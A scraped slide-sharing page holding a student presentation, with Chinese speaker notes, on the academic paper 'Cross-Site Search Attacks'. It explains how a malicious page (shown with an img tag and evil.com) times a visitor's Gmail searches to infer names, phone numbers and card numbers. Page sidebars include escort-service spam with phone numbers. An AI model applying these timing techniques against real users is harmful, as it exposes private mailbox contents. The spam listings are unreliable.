Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...Brian Keith
 
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)Laura Chiticariu
 
Jak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachJak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachThe Software House
 
Jak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachJak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachBartoszDrozd2
 
User Centered Analytics: Superweek 2015
User Centered Analytics: Superweek 2015User Centered Analytics: Superweek 2015
User Centered Analytics: Superweek 2015Tim Leighton-Boyce
 
Behind the scenes data engineering
Behind the scenes data engineeringBehind the scenes data engineering
Behind the scenes data engineeringElse de boer
 
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...Noriaki Tatsumi
 
Introduction to Machine Learning: Process and Roles
Introduction to Machine Learning: Process and Roles Introduction to Machine Learning: Process and Roles
Introduction to Machine Learning: Process and RolesAlexey Grigorev
 

Similar to XSSearch (20)

Timing attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacksTiming attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacks
 
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
 
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
 
kdd2015
kdd2015kdd2015
kdd2015
 
Atul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptxAtul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptx
 
Nondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of UsNondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of Us
 
Async Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan StepanovićAsync Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
 
Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)
 
Instant Question Answering System
Instant Question Answering SystemInstant Question Answering System
Instant Question Answering System
 
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
 
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
 
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
 
Jak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachJak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzach
 
Jak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzachJak utrzymać stado Lambd w ryzach
Jak utrzymać stado Lambd w ryzach
 
Dev Day
Dev DayDev Day
Dev Day
 
Resume
ResumeResume
Resume
 
User Centered Analytics: Superweek 2015
User Centered Analytics: Superweek 2015User Centered Analytics: Superweek 2015
User Centered Analytics: Superweek 2015
 
Behind the scenes data engineering
Behind the scenes data engineeringBehind the scenes data engineering
Behind the scenes data engineering
 
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...
Voice Summit 2018 - Millions of Dollars in Helping Customers Through Searchin...
 
Introduction to Machine Learning: Process and Roles
Introduction to Machine Learning: Process and Roles Introduction to Machine Learning: Process and Roles
Introduction to Machine Learning: Process and Roles
 

Recently uploaded

Midocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxMidocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxolyaivanovalion
 
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...amitlee9823
 
Introduction-to-Machine-Learning (1).pptx
Introduction-to-Machine-Learning (1).pptxIntroduction-to-Machine-Learning (1).pptx
Introduction-to-Machine-Learning (1).pptxfirstjob4
 
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...amitlee9823
 
CebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxCebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxolyaivanovalion
 
Smarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxSmarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxolyaivanovalion
 
Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...shambhavirathore45
 
Invezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signalsInvezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signalsInvezz1
 
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptxBPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptxMohammedJunaid861692
 
Data-Analysis for Chicago Crime Data 2023
Data-Analysis for Chicago Crime Data 2023Data-Analysis for Chicago Crime Data 2023
Data-Analysis for Chicago Crime Data 2023ymrp368
 
Week-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interactionWeek-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interactionfulawalesam
 
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort ServiceBDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort ServiceDelhi Call girls
 
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...Valters Lauzums
 
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...amitlee9823
 
Edukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFxEdukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFxolyaivanovalion
 
Carero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptxCarero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptxolyaivanovalion
 
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 

Recently uploaded (20)

Midocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFxMidocean dropshipping via API with DroFx
Midocean dropshipping via API with DroFx
 
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
Chintamani Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore ...
 
Introduction-to-Machine-Learning (1).pptx
Introduction-to-Machine-Learning (1).pptxIntroduction-to-Machine-Learning (1).pptx
Introduction-to-Machine-Learning (1).pptx
 
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
 
CebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxCebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptx
 
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Smarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxSmarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptx
 
Sampling (random) method and Non random.ppt
Sampling (random) method and Non random.pptSampling (random) method and Non random.ppt
Sampling (random) method and Non random.ppt
 
Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...
 
Invezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signalsInvezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signals
 
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptxBPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
 
Data-Analysis for Chicago Crime Data 2023
Data-Analysis for Chicago Crime Data 2023Data-Analysis for Chicago Crime Data 2023
Data-Analysis for Chicago Crime Data 2023
 
Week-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interactionWeek-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interaction
 
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts ServiceCall Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
 
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort ServiceBDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
 
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
 
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
 
Edukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFxEdukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFx
 
Carero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptxCarero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptx
 
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 

XSSearch

  • 1. Cross-Site Search Attacks CCS 2015 2 citation Nethanel Gelernter Department of Computer Science at Bar Ilan University Amir Herzberg Department of Computer Science at Bar Ilan University
  • 2. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
  • 3. Motivation ● Image you're an attacker, who has a website
  • 4. Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time
  • 5. Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time ● What request will you send?
  • 6. Motivation ● What request will you send? – request to his Gmail home page?
  • 7. Motivation ● What request will you send? – request to his Gmail home page? → login or not not-logged => fast logged => slower
  • 8. Motivation ● What request will you send? – request to his Gmail home page? → login or not – However, visitor's network condition varies visitorA: not-logined => faster? visitorB: logined => slower?
  • 9. Motivation ● If you know whether user login or not, – there's a dummy request, – T(dummy) ~= T(not-logined) visitorA: not-logined visitorB: logined dummy dummy 253ms 246ms 100ms 15ms
  • 10. Motivation ● What request will you send? – request to search on his Gmail? ● seems to be more useful dummy => always no match target
  • 11. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name
  • 12. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number
  • 13. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number – many request for no-reply@xxx.com? ● no-reply@firstbank.com.tw → a client of Taiwan FirstBank ? ● no-reply@cht.tw → a mobile user of ChungHua Telecom? ● no-reply@amazon.com → like to shop at Amazon?
  • 14. Motivation ● If you can make your visitor – send any requests – and measure the response time ● Targeting at search service can find more sensitive information
  • 15. Motivation ● You can make your visitor – send any requests – and measure the response time XS-Timing Attack
  • 16. Motivation ● You can make your visitor – send any requests – and measure the response time ● XS Search Attack = XS-Timing Attack on search service XS-Timing Attack
  • 17. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
  • 18. XS-Timing Attack ● You can make your visitor – send any requests – and measure the response time ● Questions – How to make visitor send request? – Why not the response content?
  • 20. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain
  • 21. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain <img src=”https://mail.google.com/mail/#search/little mountain”>
  • 25. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Same-Origin Policy
  • 26. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com However, you can measure the time
  • 27. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes!
  • 28. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation)
  • 29. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small
  • 30. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small dummy => 0 match 10 samples Avg 734ms target => 50 match 10 samples Avg 751ms
  • 31. Problem dummy query: always response fast target query – fast => empty – slower => non-empty enlarge the difference ● Response time = T(communication)+T(computation)
  • 32. Main Idea ● Enlarge timing difference strategy T (communication)∝contentlength – Response-Inflate T (computation) – Compute-Inflate
  • 33. Response-Inflate search query is copied once for each matched entry Observation
  • 34. Response-Inflate search query is copied once for each matched entry Observation => extend to max(query size) < 8KB
  • 35. Compute-Inflate early abort on terms which resolves false Observation A∧B
  • 36. Compute-Inflate early abort on terms which resolves false Observation Dummy Target A∧B
  • 37. Compute-Inflate early abort on terms which resolves false Observation => can detect even single match on Gmail! Dummy Target A∧B
  • 38. Evaluation: Compute-Inflate ● 138 active Gmail user – 90 University schoolmate – 48 Amazon M-Turk worker ● Sent a email contain single sentence – “I like [random-animal]” Dummy Target
  • 43. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox?
  • 44. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n)
  • 45. Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) – Binary search – O(log n)
  • 46. Evaluation: Efficient Term Identification ● 138 active Gmail user ● Sent a email contain single sentence – “I like [random-animal]” – 32 animal options accuracy time
  • 47. Claimed Experiment ● Attack on Credit number – Focus on MasterCard, Visa ● Format: 4-4-4-4 ● Attack Flow 1. Find all four 4-digit number (10,000 options) 2. Find order of the 4-digit numbers ● omit wrong combination by credit card's checksum
  • 48. Conclusion ● Good discovery of how search service makes XS-Timing Attack realistic ● Typical bad paper writing style
  • 49. Cross-Site Search Attacks CCS 2015 2 citation Nethanel Gelernter Department of Computer Science at Bar Ilan University Amir Herzberg Department of Computer Science at Bar Ilan University 今天要講的是 cross-site search attack 作者是以色列巴伊蘭大學
  • 50. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion 這篇是第一個發現 XS Search Attack 攻擊的 paper 一開始 motivation 講為何有人會想做這種攻擊 再來 backgroud 講 XS Search Attack 的原理 原理是 XS-Timing Attack 會介紹他是怎麼做的 然後是重點 使用 XS-Timing attack 會遇到的 challenge 是這篇要解決的問題 這篇發現利用 search service 常見的特性 剛好可以解 決 challenge 之後講 solution 看實驗 evaluation 最後結論
  • 51. Motivation ● Image you're an attacker, who has a website 想像你現在是個 Attacker 你經營了一個惡意網站
  • 52. Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time 而且你有能力操作來網站的 visitor 的瀏覽器 你可以讓 visitor 的瀏覽器送出任意的 request 要送什麼 request 要送到哪都可以 那送出後 你能測 request 的回傳時間
  • 53. Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time ● What request will you send? 那麼你想送什麼 request 來得到什麼資訊呢?
  • 54. Motivation ● What request will you send? – request to his Gmail home page? 送個 request 給 visitor 的 Gmail 首頁好不好?
  • 55. Motivation ● What request will you send? – request to his Gmail home page? → login or not not-logged => fast logged => slower 比較時間差 你頂多只能知道他有沒有登入 根據自己用 電腦經驗有登入時比較快沒登入比較慢
  • 56. Motivation ● What request will you send? – request to his Gmail home page? → login or not – However, visitor's network condition varies visitorA: not-logined => faster? visitorB: logined => slower? 但仔細一想會覺得怪怪的 visitor 是不同人 假如實際情況是 visitorA 沒登入 visitorB 有登入 那 A 真的會比 B 快嗎? 不一定吧 A B 地理位置可能差很多 A 如果連到 Gmail 可能要 routing 比較久 那測到的時間反而是 A 比 B 慢 所以比較不同 visitor 的回傳時間 無法推論出 visitor 到底有沒有登入 那該怎麼辦呢?
  • 57. Motivation ● If you know whether user login or not, – there's a dummy request, – T(dummy) ~= T(not-logined) visitorA: not-logined visitorB: logined dummy dummy 253ms 246ms 100ms 15ms 那就讓 visitor 自己比 怎麼比呢? 如果有個 request dummy request 不管 user 有沒有登入 dummy request 的回傳時間都 跟沒有登入的時間差不多的話 那麼想知道 visitor 有沒有登入 就讓這個 visitor 送出兩 個 request 一個給 Gmail 首頁一個給 dummy 然後 比較兩個 request 的時間 比如 A 到 Gmail 首頁是 252ms 到 dummy 是 246ms 時間差不多 可以推論 A 沒有登入 那這樣做即使 visitor 網路狀況不同 也可以知道 visitor 有沒有登入
  • 58. Motivation ● What request will you send? – request to search on his Gmail? ● seems to be more useful dummy => always no match target 知道 visior 有沒有登入 Gmail 好像沒什麼用 那麼送 request 去搜尋 visitor 信箱如何?查查看 visitor 信箱裡有沒有出現過某個字? 那跟剛剛一樣 要解決 visitor 網路狀況不同的問題 可以 找個你知道一定不會有 match 的搜尋 比如搜尋一串 隨機產生的字串當作 dummy Dummy 你想搜尋的 target 只要比較慢就是有結果 那麼你要對 visitor 的信箱做什麼搜尋呢?
  • 59. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name 猜他的真實姓名?用暴力法測所有可能的名字 有 match 的話就可以知道他叫什麼名字
  • 60. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number 同樣暴力搜尋 可以找出 visitor 的手機號碼
  • 61. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number – many request for no-reply@xxx.com? ● no-reply@firstbank.com.tw → a client of Taiwan FirstBank ? ● no-reply@cht.tw → a mobile user of ChungHua Telecom? ● no-reply@amazon.com → like to shop at Amazon? 還有大家應該收過來自 no-reply@xxx 的信吧 訂閱的 blog Youtube 熱門影片 銀行定期 digest 等等 那麼能 知道 visitor 是不是台灣第一銀行的用戶阿 是不是中 華電信的用戶 是不是在 Amazon 買過東西阿 能知道這些資訊 知道愈多就能做出愈讓人相信的詐騙 訊息
  • 62. Motivation ● If you can make your visitor – send any requests – and measure the response time ● Targeting at search service can find more sensitive information 所以如果你有操作 visitor 瀏覽器送 request 測時間的 能力 把目標鎖定在 search service 似乎很有機會找 到敏感的資訊
  • 63. Motivation ● You can make your visitor – send any requests – and measure the response time XS-Timing Attack 一開始假設的 你可以操作 visitor 瀏覽器送 requst 且測 時間的 攻擊手法就是 XS-Timing Attack
  • 64. Motivation ● You can make your visitor – send any requests – and measure the response time ● XS Search Attack = XS-Timing Attack on search service XS-Timing Attack 那鎖定在 search service 的就是 XS Search Attack 但是要使用 XS-Timing 有很大的 challenge 這篇是第 一個發現 search service 剛好可以解決 XS-Timing 的 challenge 讓這種攻擊變的有威脅力
  • 65. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
  • 66. XS-Timing Attack ● You can make your visitor – send any requests – and measure the response time ● Questions – How to make visitor send request? – Why not the response content? 第一個 要怎麼樣讓 XS-Timing Attack 可以讓 visitor 送出任何 你想要的 request? 第二個 那為什麼只能測時間呢?不能得到 response 的內容呢?
  • 67. XS-Timing Attack 假設你想讓 visitor 送的 request 是去 Gmail 信箱搜尋 包含小山 little mountain 的信
  • 68. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain 那 request 網址長這樣 要怎麼讓瀏覽器自動送出 request 呢?
  • 69. XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain <img src=”https://mail.google.com/mail/#search/little mountain”> 寫過網頁應該知道 瀏覽器在解析某些 tag 比如圖片 tag 會自動送出 GET 去要資源 所以你把 URL 寫在圖片來源網址裡 visitor 瀏覽器在 load 的時候 就會自動送出這個 request
  • 70. XS-Timing Attack google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com 但到目前第一個問題只解了一半 因為必須登入信箱才 能在裏面做搜尋 網頁用 cookie 來辨識有沒有登入 這個 Gmail 搜尋 request 必須要附上 gmail 的 cookie 才會被 Gmail 處理 那對於 img tag 發出的 request 瀏覽器會不會附上 cookie 呢?
  • 71. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com 答案是有 瀏覽器 會查看 request 送出的目的地 也就是 gmail 那瀏裡器裡跟 gmail 同個 domain 的 cookie 會自動一起送出去
  • 72. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Gmail 在收到 request 後就處理 回傳搜尋結果
  • 73. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Same-Origin Policy 那瀏覽器收到後 檢查類型發現是網頁 可是明明跟說是 要去拿圖片 所以瀏覽器知道這個網站想拿網頁做壞 事 那就禁止網站讀取回傳內容 能做的壞事就被大大 限制住了 那整套規定哪些資源瀏覽器可以自動送 request 哪些 不行 如果被騙了該怎麼處理 就是 same-origin policy 規定的事
  • 74. XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com However, you can measure the time 但重點來了 即使看不到回傳內容 還是可以測 request 從送出到收到回應的時間阿 可以測時間 就能做 XS-Timing Attack
  • 75. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! XS-Timing Attack 的 challenge 最大的困難在於 剛剛說的跟 dummy 比較時間差來推 論有沒有 match 的方法 常常判斷錯誤
  • 76. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) 那原因是 首先測到的 response 回傳時間 是網路傳過 去傳回來的 communication 時間加上 server 處理 request 的 computation 時間
  • 77. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small 第 1 是網路狀況太差時 即使與 dummy 有時間差 也無 法判斷是否真的有結果而不是 delay 造成的 第 2 假設網路穩定 communication 時間固定 現在 server 運算能力很強 有沒有結果可能 compute 起來 都很快 快到看不出差別
  • 78. Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small dummy => 0 match 10 samples Avg 734ms target => 50 match 10 samples Avg 751ms 給大家一個數據 我寫了個可以做 XS-Timing 的網站 用 穩定的宿網測在我信箱兩搜尋這裡個字串的時間 一 個 dummy 搜隨機字串 沒有 match 另一個搜我的帳 號 有 50 個 match 一次送 10 組 取平均時間 結果差距只有 25 個 ms 所以直接用 XS-Timing Attack 即使網路穩定 有 50 個 match 很可能會判斷錯誤
  • 79. Problem dummy query: always response fast target query – fast => empty – slower => non-empty enlarge the difference ● Response time = T(communication)+T(computation) 提升 timing attack 效率的重點在於 加大有結果時對 dummy 的時間差
  • 80. Main Idea ● Enlarge timing difference strategy T (communication)∝contentlength – Response-Inflate T (computation) – Compute-Inflate 加大時間差的方法有兩個方向 1. 讓有 match 的 response 變長 增加網路傳送時間 2. 增加有 match 時的計算量
  • 81. Response-Inflate search query is copied once for each matched entry Observation 增加長度的方法是根據這個觀察 下的 search query 在 match 的結果裡 每一個 match 的 entry 都會被複製 一次
  • 82. Response-Inflate search query is copied once for each matched entry Observation => extend to max(query size) < 8KB 所以只要讓 query 變長 response 就會變長 那你可以用 OR 來增長 query 而不改變 search 結果
  • 83. Compute-Inflate early abort on terms which resolves false Observation A∧B 用的觀察是 search service 在 evaluation query 有順 序而且為了效率通常會 early abort 比如這個 query A AND B 如果 evaluate 順序是先 A 再 B 的話 A evaluate 出 false 就會直接 abort 省去算 B 的時間 換句話說 只要能找到會讓 search service 算很久的 B 就可以大幅增加有 match 時的時間差
  • 84. Compute-Inflate early abort on terms which resolves false Observation Dummy Target A∧B 在 Gmail 裡不難設計 在想搜尋的字後面做 has-not 一大堆根本不會存在的 字 如果接 100 個 Gmail 必須確認確實不包含任何個 字才能 return
  • 85. Compute-Inflate early abort on terms which resolves false Observation => can detect even single match on Gmail! Dummy Target A∧B 那這樣的效果很棒 claim 在 active 的 Gmail 帳戶裡 即 使 query 只有一個 match 也能偵測出來
